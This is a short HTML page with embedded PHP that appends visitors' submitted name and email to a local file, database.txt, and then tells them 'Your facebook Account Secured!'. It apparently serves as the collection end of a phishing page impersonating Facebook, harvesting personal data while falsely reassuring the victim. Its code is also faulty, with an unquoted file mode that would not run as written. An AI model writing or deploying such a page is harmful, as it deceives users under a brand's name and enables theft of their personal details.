<html>
<head>
<title>Account Secured</title>
</head>
<body>
<?php
$file=fopen("database.txt",x+);
$a="name=";
$b="email=";
fwrite($file,$a);
fwrite($file,$_POST["name"]);
fwrite($file,$b);
fwrite($file,$_POST["email"]);
fclose($file);
?>
<h1>Your facebook Account Secured!</h1>

</body>
</html>